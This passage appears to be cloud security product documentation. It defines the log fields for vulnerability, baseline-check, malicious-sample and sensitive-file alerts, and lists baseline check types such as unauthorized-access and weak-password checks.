The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Vulnerability risk fields
|
Field |
Description |
Example |
|
vul_name |
The vulnerability name. |
imgsca:java:gson:AVD-2022-25647 |
|
vul_alias_name |
The vulnerability alias. |
gson code issue vulnerability (CVE-2022-25647) |
|
vul_primary_id |
The primary key ID of the vulnerability. |
990174361 |
|
type |
The vulnerability type. Values: |
sca |
|
alert_level |
The vulnerability risk level. Values: |
asap |
|
instance_name |
The hostname. |
hhht-linux-*** |
|
operation |
The action performed on the vulnerability. Values: |
new |
|
status |
The vulnerability status. Values: |
1 |
|
tag |
The vulnerability tag. Values: |
oval |
Baseline check fields
|
Field |
Description |
Example |
|
check_item_name |
The name of the check item. |
Set password expiration time |
|
check_item_level |
The check item risk level. Values: |
high |
|
check_type |
The type of the check item. |
Identity authentication |
|
risk_level |
The risk level. Values: |
low |
|
operation |
The action. Values: |
new |
|
risk_name |
The name of the risk item. |
Password policy compliance check |
|
status |
The check item status. Values: |
1 |
|
sub_type_alias_name |
The alias of the subtype. |
Alibaba Cloud standard - CentOS Linux 7/8 security baseline |
|
sub_type_name |
The baseline subtype name. For valid values, see the List of baseline types and subtypes. |
hc_centos7 |
|
type_name |
The baseline type name. |
hc_best_secruity |
|
type_alias_name |
The alias of the type. |
Best security practices |
|
container_id |
The container ID. |
b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
|
container_name |
The container name. |
k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Malicious sample fields
|
Field |
Description |
Example |
|
alert_level |
The risk level. Values: |
suspicious |
|
alert_name |
The name of the malicious sample alert. |
Suspicious Process-SSH-based |
|
operation |
The action. Values: |
new |
|
status |
The malicious sample risk status. Values: |
0 |
|
suspicious_event_id |
The alert event ID. |
909361 |
Sensitive file fields
|
Field |
Description |
Example |
|
alert_level |
The risk level. Values: |
high |
|
rule_name |
The file type name. |
Ionic token |
|
file_path |
The path of the sensitive file. |
/Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
|
result |
The check result. |
{"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Appendix
List of baseline types and subtypes
|
Type name |
Subtype name |
Description |
|
hc_exploit |
hc_exploit_redis |
High-risk threat exploit: Unauthorized access to Redis |
|
hc_exploit_activemq |
High-risk threat exploit: Unauthorized access to ActiveMQ |
|
|
hc_exploit_couchdb |
High-risk threat exploit: Unauthorized access to CouchDB |
|
|
hc_exploit_docker |
High-risk threat exploit: Unauthorized access to Docker |
|
|
hc_exploit_es |
High-risk threat exploit: Unauthorized access to Elasticsearch |
|
|
hc_exploit_hadoop |
High-risk threat exploit: Unauthorized access to Hadoop |
|
|
hc_exploit_jboss |
High-risk threat exploit: Unauthorized access to JBoss |
|
|
hc_exploit_jenkins |
High-risk threat exploit: Unauthorized access to Jenkins |
|
|
hc_exploit_k8s_api |
High-risk threat exploit: Unauthorized access to Kubernetes API server |
|
|
hc_exploit_ldap |
High-risk threat exploit: Unauthorized access to LDAP (Windows) |
|
|
hc_exploit_ldap_linux |
High-risk threat exploit: Unauthorized access to OpenLDAP (Linux) |
|
|
hc_exploit_memcache |
High-risk threat exploit: Unauthorized access to Memcached |
|
|
hc_exploit_mongo |
High-risk threat exploit: Unauthorized access to MongoDB |
|
|
hc_exploit_pgsql |
High-risk threat exploit: Unauthorized access to PostgreSQL baseline |
|
|
hc_exploit_rabbitmq |
High-risk threat exploit: Unauthorized access to RabbitMQ |
|
|
hc_exploit_rsync |
High-risk threat exploit: Unauthorized access to rsync |
|
|
hc_exploit_tomcat |
High-risk threat exploit: Apache Tomcat AJP file inclusion vulnerability |
|
|
hc_exploit_zookeeper |
High-risk threat exploit: Unauthorized access to ZooKeeper |
|
|
hc_container |
hc_docker |
Alibaba Cloud standard: Docker security baseline check |
|
hc_middleware_ack_master |
International security best practices: Kubernetes (ACK) master node security baseline check |
|
|
hc_middleware_ack_node |
International security best practices: Kubernetes (ACK) node security baseline check |
|
|
hc_middleware_k8s |
Alibaba Cloud standard: Kubernetes master security baseline check |
|
|
hc_middleware_k8s_node |
Alibaba Cloud standard: Kubernetes node security baseline check |
|
|
cis |
hc_suse 15_djbh |
MLPS Level 3: SUSE 15 compliance baseline check |
|
hc_aliyun_linux3_djbh_l3 |
MLPS Level 3: Alibaba Cloud Linux 3 compliance baseline check |
|
|
hc_aliyun_linux_djbh_l3 |
MLPS Level 3: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check |
|
|
hc_bind_djbh |
MLPS Level 3: Bind compliance baseline check |
|
|
hc_centos 6_djbh_l3 |
MLPS Level 3: CentOS Linux 6 compliance baseline check |
|
|
hc_centos 7_djbh_l3 |
MLPS Level 3: CentOS Linux 7 compliance baseline check |
|
|
hc_centos 8_djbh_l3 |
MLPS Level 3: CentOS Linux 8 compliance baseline check |
|
|
hc_debian_djbh_l3 |
MLPS Level 3: Debian Linux 8/9/10 compliance baseline check |
|
|
hc_iis_djbh |
MLPS Level 3: IIS compliance baseline check |
|
|
hc_informix_djbh |
MLPS Level 3: Informix compliance baseline check |
|
|
hc_jboss_djbh |
MLPS Level 3: JBoss compliance baseline check |
|
|
hc_mongo_djbh |
MLPS Level 3: MongoDB compliance baseline check |
|
|
hc_mssql_djbh |
MLPS Level 3: SQL Server compliance baseline check |
|
|
hc_mysql_djbh |
MLPS Level 3: MySQL compliance baseline check |
|
|
hc_nginx_djbh |
MLPS Level 3: Nginx compliance baseline check |
|
|
hc_oracle_djbh |
MLPS Level 3: Oracle compliance baseline check |
|
|
hc_pgsql_djbh |
MLPS Level 3: PostgreSQL compliance baseline check |
|
|
hc_redhat 6_djbh_l3 |
MLPS Level 3: Red Hat Linux 6 compliance baseline check |
|
|
hc_redhat_djbh_l3 |
MLPS Level 3: Red Hat Linux 7 compliance baseline check |
|
|
hc_redis_djbh |
MLPS Level 3: Redis compliance baseline check |
|
|
hc_suse 10_djbh_l3 |
MLPS Level 3: SUSE 10 compliance baseline check |
|
|
hc_suse 12_djbh_l3 |
MLPS Level 3: SUSE 12 compliance baseline check |
|
|
hc_suse_djbh_l3 |
MLPS Level 3: SUSE 11 compliance baseline check |
|
|
hc_ubuntu 14_djbh_l3 |
MLPS Level 3: Ubuntu 14 compliance baseline check |
|
|
hc_ubuntu_djbh_l3 |
MLPS Level 3: Ubuntu 16/18/20 compliance baseline check |
|
|
hc_was_djbh |
MLPS Level 3: WebSphere Application Server compliance baseline check |
|
|
hc_weblogic_djbh |
MLPS Level 3: WebLogic compliance baseline check |
|
|
hc_win 2008_djbh_l3 |
MLPS Level 3: Windows 2008 R2 compliance baseline check |
|
|
hc_win 2012_djbh_l3 |
MLPS Level 3: Windows 2012 R2 compliance baseline check |
|
|
hc_win 2016_djbh_l3 |
MLPS Level 3: Windows 2016/2019 compliance baseline check |
|
|
hc_aliyun_linux_djbh_l2 |
MLPS Level 2: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check |
|
|
hc_centos 6_djbh_l2 |
MLPS Level 2: CentOS Linux 6 compliance baseline check |
|
|
hc_centos 7_djbh_l2 |
MLPS Level 2: CentOS Linux 7 compliance baseline check |
|
|
hc_debian_djbh_l2 |
MLPS Level 2: Debian Linux 8 compliance baseline check |
|
|
hc_redhat 7_djbh_l2 |
MLPS Level 2: Red Hat Linux 7 compliance baseline check |
|
|
hc_ubuntu_djbh_l2 |
MLPS Level 2: Ubuntu 16/18 compliance baseline check |
|
|
hc_win 2008_djbh_l2 |
MLPS Level 2: Windows 2008 R2 compliance baseline check |
|
|
hc_win 2012_djbh_l2 |
MLPS Level 2: Windows 2012 R2 compliance baseline check |
|
|
hc_win 2016_djbh_l2 |
MLPS Level 2: Windows 2016/2019 compliance baseline check |
|
|
hc_aliyun_linux_cis |
International security best practices: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check |
|
|
hc_centos 6_cis_rules |
International security best practices: CentOS Linux 6 security baseline check |
|
|
hc_centos 7_cis_rules |
International security best practices: CentOS Linux 7 security baseline check |
|
|
hc_centos 8_cis_rules |
International security best practices: CentOS Linux 8 security baseline check |
|
|
hc_debian 8_cis_rules |
International security best practices: Debian Linux 8 security baseline check |
|
|
hc_ubuntu 14_cis_rules |
International security best practices: Ubuntu 14 security baseline check |
|
|
hc_ubuntu 16_cis_rules |
International security best practices: Ubuntu 16/18/20 security baseline check |
|
|
hc_win 2008_cis_rules |
International security best practices: Windows Server 2008 R2 security baseline check |
|
|
hc_win 2012_cis_rules |
International security best practices: Windows Server 2012 R2 security baseline check |
|
|
hc_win 2016_cis_rules |
International security best practices: Windows Server 2016/2019 security baseline check |
|
|
hc_kylin_djbh_l3 |
MLPS Level 3: Kylin compliance baseline check |
|
|
hc_uos_djbh_l3 |
MLPS Level 3: UOS compliance baseline check |
|
|
hc_best_security |
hc_aliyun_linux |
Alibaba Cloud standard: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check |
|
hc_centos 6 |
Alibaba Cloud standard: CentOS Linux 6 security baseline check |
|
|
hc_centos 7 |
Alibaba Cloud standard: CentOS Linux 7/8 security baseline check |
|
|
hc_debian |
Alibaba Cloud standard: Debian Linux 8/9/10 security baseline check |
|
|
hc_redhat 6 |
Alibaba Cloud standard: Red Hat Linux 6 security baseline check |
|
|
hc_redhat 7 |
Alibaba Cloud standard: Red Hat Linux 7/8 security baseline check |
|
|
hc_ubuntu |
Alibaba Cloud standard: Ubuntu security baseline check |
|
|
hc_windows_2008 |
Alibaba Cloud standard: Windows 2008 R2 security baseline check |
|
|
hc_windows_2012 |
Alibaba Cloud standard: Windows 2012 R2 security baseline check |
|
|
hc_windows_2016 |
Alibaba Cloud standard: Windows 2016/2019 security baseline check |
|
|
hc_db_mssql |
Alibaba Cloud standard: SQL Server security baseline check |
|
|
hc_memcached_ali |
Alibaba Cloud standard: Memcached security baseline check |
|
|
hc_mongodb |
Alibaba Cloud standard: MongoDB 3.x security baseline check |
|
|
hc_mysql_ali |
Alibaba Cloud standard: MySQL security baseline check |
|
|
hc_oracle |
Alibaba Cloud standard: Oracle 11g security baseline check |
|
|
hc_pgsql_ali |
Alibaba Cloud standard: PostgreSQL security baseline check |
|
|
hc_redis_ali |
Alibaba Cloud standard: Redis security baseline check |
|
|
hc_apache |
Alibaba Cloud standard: Apache security baseline check |
|
|
hc_iis_8 |
Alibaba Cloud standard: IIS 8 security baseline check |
|
|
hc_nginx_linux |
Alibaba Cloud standard: Nginx security baseline check |
|
|
hc_suse 15 |
Alibaba Cloud standard: SUSE Linux 15 security baseline check |
|
|
tomcat 7 |
Alibaba Cloud standard: Apache Tomcat security baseline check |
|
|
weak_password |
hc_mongodb_pwd |
Weak password: MongoDB logon weak password detection (version 2.x) |
|
hc_weakpwd_ftp_linux |
Weak password: FTP logon weak password check |
|
|
hc_weakpwd_linux_sys |
Weak password: Linux system logon weak password check |
|
|
hc_weakpwd_mongodb 3 |
Weak password: MongoDB logon weak password detection |
|
|
hc_weakpwd_mssql |
Weak password: SQL Server database logon weak password check |
|
|
hc_weakpwd_mysql_linux |
Weak password: MySQL database logon weak password check |
|
|
hc_weakpwd_mysql_win |
Weak password: MySQL database logon weak password check (Windows) |
|
|
hc_weakpwd_openldap |
Weak password: OpenLDAP logon weak password check |
|
|
hc_weakpwd_oracle |
Weak password: Oracle logon weak password detection |
|
|
hc_weakpwd_pgsql |
Weak password: PostgreSQL database logon weak password check |
|
|
hc_weakpwd_pptp |
Weak password: pptpd service logon weak password check |
|
|
hc_weakpwd_redis_linux |
Weak password: Redis database logon weak password check |
|
|
hc_weakpwd_rsync |
Weak password: rsync service logon weak password check |
|
|
hc_weakpwd_svn |
Weak password: SVN service logon weak password check |
|
|
hc_weakpwd_tomcat_linux |
Weak password: Apache Tomcat console weak password check |
|
|
hc_weakpwd_vnc |
Weak password: VNC Server weak password check |
|
|
hc_weakpwd_weblogic |
Weak password: WebLogic 12c logon weak password detection |
|
|
hc_weakpwd_win_sys |
Weak password: Windows system logon weak password check |